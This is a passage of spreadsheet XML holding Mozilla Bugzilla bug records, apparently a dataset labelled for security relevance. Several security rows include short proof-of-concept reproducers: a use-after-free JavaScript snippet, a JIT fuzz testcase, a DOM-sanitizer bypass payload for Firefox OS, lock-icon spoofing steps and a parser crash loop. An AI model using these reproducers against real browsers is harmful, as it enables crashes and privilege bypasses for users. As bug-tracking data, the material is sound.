        <is>
          <t>gecko-decision not running at all</t>
        </is>
      </c>
      <c r="D2535" t="inlineStr">
        <is>
          <t>2016-01-13 19:30:51 -0800</t>
        </is>
      </c>
      <c r="E2535" t="n">
        <v>1</v>
      </c>
      <c r="F2535" t="n">
        <v>1</v>
      </c>
      <c r="G2535" t="n">
        <v>5</v>
      </c>
      <c r="H2535" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2535" t="inlineStr">
        <is>
          <t>Taskcluster</t>
        </is>
      </c>
      <c r="J2535" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2535" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2535" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2535" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2535" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2535" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2535" t="inlineStr"/>
      <c r="Q2535" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2535" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2535" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2535" t="n">
        <v>1</v>
      </c>
      <c r="U2535" t="n">
        <v>0</v>
      </c>
      <c r="V2535" t="n">
        <v>3</v>
      </c>
      <c r="W2535" t="inlineStr">
        <is>
          <t>They don't even show up
https://treeherder.mozilla.org/#/jobs?repo=mozilla-inbound&amp;fromchange=f1ebaf0ca071&amp;selectedJob=19772623&amp;filter-searchStr=870c4af58f366405c43e1a9c5469dd7a9e90d625</t>
        </is>
      </c>
      <c r="X2535" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2536">
      <c r="A2536" t="n">
        <v>487204</v>
      </c>
      <c r="B2536" t="inlineStr">
        <is>
          <t>2009-04-07 06:12:21 -0700</t>
        </is>
      </c>
      <c r="C2536" t="inlineStr">
        <is>
          <t>js_FillPropertyCache is called with garbage-collected pobj</t>
        </is>
      </c>
      <c r="D2536" t="inlineStr">
        <is>
          <t>2010-03-17 19:08:45 -0700</t>
        </is>
      </c>
      <c r="E2536" t="n">
        <v>1</v>
      </c>
      <c r="F2536" t="n">
        <v>1</v>
      </c>
      <c r="G2536" t="n">
        <v>3</v>
      </c>
      <c r="H2536" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2536" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2536" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2536" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2536" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2536" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2536" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2536" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2536" t="inlineStr">
        <is>
          <t>[needs approval/landing for 1.8 branch][sg:critical?] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q2536" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2536" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2536" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2536" t="n">
        <v>1</v>
      </c>
      <c r="U2536" t="n">
        <v>0</v>
      </c>
      <c r="V2536" t="n">
        <v>106</v>
      </c>
      <c r="W2536" t="inlineStr">
        <is>
          <t>The current code, when calls js_FillPropertyCache for properties found on prototype chains, does not detect that a setter or getter could have deleted the prototype and GC-ed it. This would cause js_FillPropertyCache to access GC-ed objects. Here is an example that demonstrates this:
@watson~/m/tm/js/src&gt; cat ~/s/x1.js
var obj = { __proto__: { get a() { this.__proto__ = null; gc(); return 0; }}};
obj.a;
@watson~/m/tm/js/src&gt; ~/build/js32.tm.dbg/js ~/s/x1.js
before 20480, after 20480, break 08262000
Segmentation fault
This bug exists on 1.9.* branches and may (or may not) be related to the bug 484042.</t>
        </is>
      </c>
      <c r="X2536" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2537">
      <c r="A2537" t="n">
        <v>283598</v>
      </c>
      <c r="B2537" t="inlineStr">
        <is>
          <t>2005-02-25 04:27:40 -0800</t>
        </is>
      </c>
      <c r="C2537" t="inlineStr">
        <is>
          <t>Give the firefox .dmg a nice icon</t>
        </is>
      </c>
      <c r="D2537" t="inlineStr">
        <is>
          <t>2018-11-26 09:45:22 -0800</t>
        </is>
      </c>
      <c r="E2537" t="n">
        <v>1</v>
      </c>
      <c r="F2537" t="n">
        <v>1</v>
      </c>
      <c r="G2537" t="n">
        <v>7</v>
      </c>
      <c r="H2537" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2537" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J2537" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2537" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2537" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M2537" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2537" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2537" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2537" t="inlineStr">
        <is>
          <t>[ETA 09/02][needs review beltzner]</t>
        </is>
      </c>
      <c r="Q2537" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R2537" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2537" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2537" t="n">
        <v>1</v>
      </c>
      <c r="U2537" t="n">
        <v>1</v>
      </c>
      <c r="V2537" t="n">
        <v>57</v>
      </c>
      <c r="W2537" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; de-DE; rv:1.7.6) Gecko/20050223 Firefox/1.0.1
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; de-DE; rv:1.7.6) Gecko/20050223 Firefox/1.0.1
The .dmg linked in the URL has a nice custom Icon.
I think firefox (and the other Mozilla Apps) deserve a custom Icon too
Reproducible: Always</t>
        </is>
      </c>
      <c r="X2537" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2538">
      <c r="A2538" t="n">
        <v>253121</v>
      </c>
      <c r="B2538" t="inlineStr">
        <is>
          <t>2004-07-26 10:22:49 -0700</t>
        </is>
      </c>
      <c r="C2538" t="inlineStr">
        <is>
          <t>lock icon and certificates spoofable with onunload document.write</t>
        </is>
      </c>
      <c r="D2538" t="inlineStr">
        <is>
          <t>2006-03-23 05:13:38 -0800</t>
        </is>
      </c>
      <c r="E2538" t="n">
        <v>1</v>
      </c>
      <c r="F2538" t="n">
        <v>1</v>
      </c>
      <c r="G2538" t="n">
        <v>3</v>
      </c>
      <c r="H2538" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2538" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2538" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2538" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2538" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2538" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2538" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2538" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2538" t="inlineStr"/>
      <c r="Q2538" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2538" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2538" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2538" t="n">
        <v>1</v>
      </c>
      <c r="U2538" t="n">
        <v>1</v>
      </c>
      <c r="V2538" t="n">
        <v>63</v>
      </c>
      <c r="W2538" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1
Testcase will be attached 
Reproducible: Always
Steps to Reproduce:
1. Load testcase (attachment coming soon)
2. Right click page -&gt; View Page Info, go to security tab
3. Notice that the site appears to be secure, and the certificate from
https://shellcity.net is shown
See also</t>
        </is>
      </c>
      <c r="X2538" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2539">
      <c r="A2539" t="n">
        <v>1137624</v>
      </c>
      <c r="B2539" t="inlineStr">
        <is>
          <t>2015-02-27 01:23:16 -0800</t>
        </is>
      </c>
      <c r="C2539" t="inlineStr">
        <is>
          <t>MArrayJoin misbehaves when array elements override toString</t>
        </is>
      </c>
      <c r="D2539" t="inlineStr">
        <is>
          <t>2016-07-02 10:34:41 -0700</t>
        </is>
      </c>
      <c r="E2539" t="n">
        <v>1</v>
      </c>
      <c r="F2539" t="n">
        <v>1</v>
      </c>
      <c r="G2539" t="n">
        <v>3</v>
      </c>
      <c r="H2539" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2539" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2539" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K2539" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2539" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2539" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2539" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2539" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2539" t="inlineStr">
        <is>
          <t>[adv-main37+]</t>
        </is>
      </c>
      <c r="Q2539" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2539" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2539" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T2539" t="n">
        <v>1</v>
      </c>
      <c r="U2539" t="n">
        <v>0</v>
      </c>
      <c r="V2539" t="n">
        <v>25</v>
      </c>
      <c r="W2539" t="inlineStr">
        <is>
          <t>x = []
Array.prototype.unshift.call(x, x)
f = function(j) {
    if (j) {
        schedulegc()
    } else {
        this.eval("print(0)");
        s = x.join("")
    }
};
toString = function() {
    z = 0
    return function() {
        ++z
        f(z == 3)
    }
}
()
s = x.join()
print("FOO: " + s.replace(this, ""))
relazifyFunctions()
Array.prototype.push.call(x, this)
Array.prototype.sort.call(x, function(a, x, a) {
    x | 7
})
$ ./js-dbg-64-dm-nsprBuild-darwin-0a8b3b67715a --fuzzing-safe --no-threads --ion-eager testcase.js
0
FOO:
0
0
$ ./js-dbg-64-dm-nsprBuild-darwin-0a8b3b67715a --fuzzing-safe --no-threads --baseline-eager testcase.js
0
FOO:
0
Tested this on m-c rev 0a8b3b67715a.
My configure flags are:
CC="clang -Qunused-arguments" CXX="clang++ -Qunused-arguments" AR=ar AUTOCONF=/usr/local/Cellar/autoconf213/2.13/bin/autoconf213 sh ~/trees/mozilla-central/js/src/configure --target=x86_64-apple-darwin12.5.0 --enable-debug --enable-nspr-build --enable-more-deterministic --with-ccache --enable-gczeal --enable-debug-symbols --disable-tests
python -u ~/fuzzing/js/compileShell.py -b "--enable-debug --enable-more-deterministic --enable-nspr-build -R ~/trees/mozilla-central" -r 0a8b3b67715a
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   https://hg.mozilla.org/mozilla-central/rev/eb6e90404b76
parent:      b86864fd9d60
user:        Jan de Mooij
date:        Sat Jan 17 12:54:03 2015 +0100
summary:     Bug 1116760 - Add a shell function to test function relazification. r=till
Jan, bug 1116760 probably exposed this issue. What do you think?</t>
        </is>
      </c>
      <c r="X2539" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2540">
      <c r="A2540" t="n">
        <v>126252</v>
      </c>
      <c r="B2540" t="inlineStr">
        <is>
          <t>2002-02-18 11:29:08 -0800</t>
        </is>
      </c>
      <c r="C2540" t="inlineStr">
        <is>
          <t>gnats2bz.pl rewrite</t>
        </is>
      </c>
      <c r="D2540" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:28 -0800</t>
        </is>
      </c>
      <c r="E2540" t="n">
        <v>1</v>
      </c>
      <c r="F2540" t="n">
        <v>1</v>
      </c>
      <c r="G2540" t="n">
        <v>4</v>
      </c>
      <c r="H2540" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2540" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2540" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K2540" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2540" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2540" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2540" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2540" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2540" t="inlineStr"/>
      <c r="Q2540" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2540" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2540" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T2540" t="n">
        <v>1</v>
      </c>
      <c r="U2540" t="n">
        <v>0</v>
      </c>
      <c r="V2540" t="n">
        <v>22</v>
      </c>
      <c r="W2540" t="inlineStr">
        <is>
          <t>For converting the gcc gnats database from gnats to bugzilla, we needed a lot
more features than gnats2bz.pl
So I worked on it quite a bit, making it faster, and adding a ton of features.
It's basically a rewrite, in that i've added more code than existed before.
I was asked to file an RFE with the script attached, so i'm doing so.
List of changes:
10x faster (used to take 45 minutes to handle the 270 meg of gcc gnats reports,
now takes 4.5 minutes), even with all the rest of the changes.  Mainly due to
changing the pr parser to be based on the one in gnatsweb, which is absurdly
fast.
If you don't need any of the below, just replacing the parser will probably buy
you a 20x speedup (i didn't do speed testing till i was finished, but its a bit
slower than it was when i first replaced the parser)
Chunks audit trail into separate comments, with the right From's, times, etc.
Handles followup emails that are in the report, with the right From's, times,
etc.
Properly handles duplicates, adding the standard bugzilla duplicate message.
Extracts and handles gnatsweb attachments, as well as uuencoded attachments
appearing in either followup emails, the how-to-repeat field, etc.  Replaces
them with a message to look at the attachments list, and adds the standard
"Created an attachment" message that bugzilla uses.  Handling them includes
giving them the right name and mime-type. "attachments" means multiple
uuencoded things/gnatsweb attachments are handled properly.
Handles reopened bug reports.
Builds the cc list from the people who have commented on the report, and the
reporter.
Other things i've forgotten, i'm sure (I fixed many bugs regarding parsing of
email addresses, etc)
It's hard, at first glance, to tell the result from a bugzilla database built
from scratch.
The patch is actually larger than gnats2bz.pl currently.
It has a *few* gcc specific things that are easy to remove: 
1.  we don't use op_sys and rep_platform, since you can build on any host, for
any build os, for any target.  Thus, we use a build, host, and target field
with the triplet (ie i686-pc-linux-gnu) in them.
2.  Because almost all of our attachments are text, and large text at that
(preprocessed source files), all attachments data is compressed with 
Compress::Zlib.  
This is also because noone will ever want to full-text search it.
Removing these two is a matter of just changing a few lines.
You can see the result (no changes, this is what running the script gives you)
at www.dberlin.org/bugzilla-2.14</t>
        </is>
      </c>
      <c r="X2540" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2541">
      <c r="A2541" t="n">
        <v>1400927</v>
      </c>
      <c r="B2541" t="inlineStr">
        <is>
          <t>2017-09-18 10:20:21 -0700</t>
        </is>
      </c>
      <c r="C2541" t="inlineStr">
        <is>
          <t>Building Fennec on MacOS fails when trying to build u2fhid</t>
        </is>
      </c>
      <c r="D2541" t="inlineStr">
        <is>
          <t>2019-07-18 15:08:37 -0700</t>
        </is>
      </c>
      <c r="E2541" t="n">
        <v>1</v>
      </c>
      <c r="F2541" t="n">
        <v>1</v>
      </c>
      <c r="G2541" t="n">
        <v>7</v>
      </c>
      <c r="H2541" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2541" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J2541" t="inlineStr">
        <is>
          <t>Android Studio and Gradle Integration</t>
        </is>
      </c>
      <c r="K2541" t="inlineStr">
        <is>
          <t>53 Branch</t>
        </is>
      </c>
      <c r="L2541" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2541" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2541" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2541" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2541" t="inlineStr">
        <is>
          <t>[webauthn] [u2f]</t>
        </is>
      </c>
      <c r="Q2541" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2541" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2541" t="inlineStr">
        <is>
          <t>mozilla57</t>
        </is>
      </c>
      <c r="T2541" t="n">
        <v>1</v>
      </c>
      <c r="U2541" t="n">
        <v>0</v>
      </c>
      <c r="V2541" t="n">
        <v>8</v>
      </c>
      <c r="W2541" t="inlineStr">
        <is>
          <t>Building Fennec on MacOS fails after the patches for bug 1388843:
&gt; 0:25.19 error: native frameworks are only available on macOS targets
&gt; 0:25.19 
&gt; 0:25.35 error: aborting due to previous error
&gt; 0:25.35 
&gt; 0:25.38 error: Could not compile `u2fhid`.</t>
        </is>
      </c>
      <c r="X2541" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2542">
      <c r="A2542" t="n">
        <v>1336556</v>
      </c>
      <c r="B2542" t="inlineStr">
        <is>
          <t>2017-02-03 12:03:21 -0800</t>
        </is>
      </c>
      <c r="C2542" t="inlineStr">
        <is>
          <t>Use Neutrino/WebPack instead of Grunt to do our build and minification</t>
        </is>
      </c>
      <c r="D2542" t="inlineStr">
        <is>
          <t>2018-02-07 16:35:28 -0800</t>
        </is>
      </c>
      <c r="E2542" t="n">
        <v>1</v>
      </c>
      <c r="F2542" t="n">
        <v>1</v>
      </c>
      <c r="G2542" t="n">
        <v>7</v>
      </c>
      <c r="H2542" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2542" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2542" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K2542" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2542" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2542" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2542" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2542" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2542" t="inlineStr"/>
      <c r="Q2542" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2542" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2542" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2542" t="n">
        <v>1</v>
      </c>
      <c r="U2542" t="n">
        <v>0</v>
      </c>
      <c r="V2542" t="n">
        <v>33</v>
      </c>
      <c r="W2542" t="inlineStr">
        <is>
          <t>WebPack is supposed to be easier to use with better options.  It will also make it possible to use JSX with ReactJS components.</t>
        </is>
      </c>
      <c r="X2542" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2543">
      <c r="A2543" t="n">
        <v>699594</v>
      </c>
      <c r="B2543" t="inlineStr">
        <is>
          <t>2011-11-03 14:53:26 -0700</t>
        </is>
      </c>
      <c r="C2543" t="inlineStr">
        <is>
          <t>UnmarkGrayChildren is unsafe in presence of the background finalization thread</t>
        </is>
      </c>
      <c r="D2543" t="inlineStr">
        <is>
          <t>2012-07-20 14:36:26 -0700</t>
        </is>
      </c>
      <c r="E2543" t="n">
        <v>1</v>
      </c>
      <c r="F2543" t="n">
        <v>1</v>
      </c>
      <c r="G2543" t="n">
        <v>3</v>
      </c>
      <c r="H2543" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2543" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2543" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2543" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2543" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2543" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2543" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2543" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2543" t="inlineStr">
        <is>
          <t>[sg:moderate] [advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q2543" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2543" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2543" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T2543" t="n">
        <v>1</v>
      </c>
      <c r="U2543" t="n">
        <v>0</v>
      </c>
      <c r="V2543" t="n">
        <v>15</v>
      </c>
      <c r="W2543" t="inlineStr">
        <is>
          <t>UnmarkGrayChildren, http://mxr.mozilla.org/mozilla-central/source/js/xpconnect/src/nsXPConnect.cpp#609 , recursively calls  JS_TraceChildren to unmark the gray objects. However, this is not safe if the background finalization thread is running.
The problem comes from the usage of the conservative marking calls like MarkStackRangeConservatively, http://mxr.mozilla.org/mozilla-central/source/js/src/jsiter.cpp#1139 , when navigating the object graph under JS_TraceChildren. As that call checks an address against the GC chunk table and other GC data structures to verify for live GC things it is important that the those data structures are not freed.
However, with the background finalization thread running this is violated. For example, it is possible that the background thread manages to finalize and release the GC chunk for GC thing that MarkStackRangeConservatively just finds and tries to mark. After that the memory range corresponding to the chunk can be allocated and filled from other threads. Then the GC graph traversal may call a function through a pointer stored in that filled memory.</t>
        </is>
      </c>
      <c r="X2543" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2544">
      <c r="A2544" t="n">
        <v>1190038</v>
      </c>
      <c r="B2544" t="inlineStr">
        <is>
          <t>2015-07-31 23:29:52 -0700</t>
        </is>
      </c>
      <c r="C2544" t="inlineStr">
        <is>
          <t>HTML injection on homescreen app (with bypassing DOM sanitizer)</t>
        </is>
      </c>
      <c r="D2544" t="inlineStr">
        <is>
          <t>2024-05-30 09:03:52 -0700</t>
        </is>
      </c>
      <c r="E2544" t="n">
        <v>1</v>
      </c>
      <c r="F2544" t="n">
        <v>1</v>
      </c>
      <c r="G2544" t="n">
        <v>6</v>
      </c>
      <c r="H2544" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2544" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J2544" t="inlineStr">
        <is>
          <t>Gaia</t>
        </is>
      </c>
      <c r="K2544" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2544" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2544" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N2544" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2544" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2544" t="inlineStr">
        <is>
          <t>[b2g-adv-main2.5+]</t>
        </is>
      </c>
      <c r="Q2544" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2544" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2544" t="inlineStr">
        <is>
          <t>FxOS-S4 (07Aug)</t>
        </is>
      </c>
      <c r="T2544" t="n">
        <v>1</v>
      </c>
      <c r="U2544" t="n">
        <v>0</v>
      </c>
      <c r="V2544" t="n">
        <v>17</v>
      </c>
      <c r="W2544" t="inlineStr">
        <is>
          <t>Created attachment 8642002
reproduced.png
1. Prepare a device that Firefox OS 2.5.0.0-prelease is installed.
   I used my Flame with a firmware id 201507311030207.
2. Launch Browser and open http://csrf.jp/manifest/xss.html .
3. Push 'Add to home screen' button and 'Add' button.
   Then a bookmark with a lock icon is created.
4. Long press the lock icon and try to uninstall the bookmark.
5. As attached picture, a confirmation dialog is shown with FM Radio application (if reproduced).
At step 2, the page sets "&lt;s&gt;PoC&lt;iframe src=app://fm.gaiamobile.org/index.html mozbrowser&gt;&lt;/iframe&gt;" as it's application name throught the web manifest.
When I set iframe tag simply like "&lt;iframe src=app://fm.gaiamobile.org/index.html mozbrowser&gt;&lt;/iframe&gt;" as an application name then the iframe is correctly removed by DOM sanitizer in Gaia.
But above text pattern, i.e., &lt;s&gt; + &lt;iframe&gt;, can bypass DOM sanitizer and the iframe is executed with homescreen app's privilege.</t>
        </is>
      </c>
      <c r="X2544" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2545">
      <c r="A2545" t="n">
        <v>1824892</v>
      </c>
      <c r="B2545" t="inlineStr">
        <is>
          <t>2023-03-27 21:03:40 -0700</t>
        </is>
      </c>
      <c r="C2545" t="inlineStr">
        <is>
          <t>[32-bit] Access violation on nsExpatDriver::HandleError -&gt; AppendErrorPointer</t>
        </is>
      </c>
      <c r="D2545" t="inlineStr">
        <is>
          <t>2024-05-30 11:07:25 -0700</t>
        </is>
      </c>
      <c r="E2545" t="n">
        <v>1</v>
      </c>
      <c r="F2545" t="n">
        <v>1</v>
      </c>
      <c r="G2545" t="n">
        <v>3</v>
      </c>
      <c r="H2545" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2545" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2545" t="inlineStr">
        <is>
          <t>XML</t>
        </is>
      </c>
      <c r="K2545" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2545" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2545" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2545" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2545" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2545" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main113+][adv-ESR102.11+][qa-triaged]</t>
        </is>
      </c>
      <c r="Q2545" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2545" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2545" t="inlineStr">
        <is>
          <t>114 Branch</t>
        </is>
      </c>
      <c r="T2545" t="n">
        <v>1</v>
      </c>
      <c r="U2545" t="n">
        <v>0</v>
      </c>
      <c r="V2545" t="n">
        <v>36</v>
      </c>
      <c r="W2545" t="inlineStr">
        <is>
          <t>Created attachment 9325353
testcase-0x2.html
When running `new DOMParser().parseFromString(document.documentElement.outerHTML, 'application/xml')` on large HTML continuously in loop, Firefox 32-bit able to crash with `AV_READ` on `nsExpatDriver::HandleError()` at changeable address that depends on DOM size or the length of HTML.
When running the testcase on Firefox single process `./mach run --disable-e10s ` then attach gdb debugger, the crash is shown at following code:
```
954    // Last character will be '^'.
955    int32_t last = aColNumber - 1;
956    int32_t i;
957    uint32_t minuses = 0;
958    for (i = 0; i &lt; last; ++i) {
→ 959      if (aSourceLine[i] == '\t') {
960        // Since this uses |white-space: pre;| a tab stop equals 8 spaces.
961        uint32_t add = 8 - (minuses % 8);
962        aSourceString.AppendASCII("--------", add);
963        minuses += add;
964      } else {
  ```
It looks like Firefox tried to accessing out-of-bounds element on `aSourceLine` array. In case the `aSourceLine` array address is `0x25ce0008` then the crash address is `0x25cff000`.
## Tested on:
- Firefox Nightly 113.0a1 (2023-03-27) (32-bit) on Windows 11
- Firefox 111.0.1 (32-bit) on Windows 11
- Firefox ESR 102.9.0esr (32-bit) on Windows 11
## Steps to reproduce:
1. Visit attached testcase-0x2.html
2. After a few seconds, the Firefox tab crashes
If Firefox tab doesn't crash after a while, try close the tab and try again.</t>
        </is>
      </c>
      <c r="X2545" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2546">
      <c r="A2546" t="n">
        <v>156844</v>
      </c>
